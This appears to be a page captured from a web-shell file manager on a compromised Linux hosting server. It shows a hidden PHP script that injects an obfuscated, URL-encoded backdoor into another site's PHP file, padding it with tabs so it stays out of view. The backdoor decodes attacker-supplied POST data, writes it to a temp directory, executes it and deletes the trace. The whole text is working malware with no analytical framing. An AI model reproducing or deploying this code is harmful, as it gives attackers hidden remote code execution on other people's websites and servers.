HEX
Server: Apache
System: Linux whois01.turboservers.com.au 3.10.0-962.3.2.lve1.5.87.el7.x86_64 #1 SMP Tue Jan 28 09:38:56 UTC 2025 x86_64
User: ultimatemeditati (1528)
PHP: 5.6.40
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //dev/shm/.ref
<?php  $path = '/home/abnlookups/public_html/etvcdzsw.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%28array_key_exists%28%22%5Cx64at%22%2C%20%24_POST%29%29%7B%20%24object%20%3D%20array_filter%28%5Bgetenv%28%22TEMP%22%29%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20getenv%28%22TMP%22%29%2C%20%22/var/tmp%22%2C%20session_save_path%28%29%2C%20getcwd%28%29%2C%20%22/tmp%22%2C%20%22/dev/shm%22%2C%20sys_get_temp_dir%28%29%5D%29%3B%20%24desc%20%3D%20%24_POST%5B%22%5Cx64at%22%5D%3B%20%24desc%20%3D%20explode%28%20%27.%27%20%2C%20%24desc%20%29%20%3B%20%24flag%20%3D%20%27%27%3B%20%24s%20%3D%20%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%20%24sLen%20%3D%20strlen%28%20%24s%29%3B%20%24s%20%3D%200%3B%20%24len%20%3D%20count%28%20%24desc%29%3B%20do%20%7B%20if%28%20%24s%20%3E%3D%20%24len%29%20break%3B%20%24v6%20%3D%20%24desc%5B%24s%5D%3B%20%24sChar%20%3D%20ord%28%20%24s%5B%24s%20%25%24sLen%5D%29%3B%20%24dec%20%3D%20%28%20%28%20int%29%24v6%20-%20%24sChar%20-%28%20%24s%20%2510%29%29%20%5E%2062%3B%20%24flag%20.%3D%20chr%28%20%24dec%29%3B%20%24s%2B%2B%3B%20%7D%20while%28%20true%29%3B%20foreach%20%28%24object%20as%20%24value%29%3A%20if%20%28max%280%2C%20is_dir%28%24value%29%20%2A%20is_writable%28%24value%29%29%29%20%7B%20%24reference%20%3D%20%22%24value/.ent%22%3B%20%24success%20%3D%20file_put_contents%28%24reference%2C%20%24flag%29%3B%20if%20%28%24success%29%20%7B%20include%20%24reference%3B%20%40unlink%28%24reference%29%3B%20exit%3B%7D%20%7D%20endforeach%3B%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');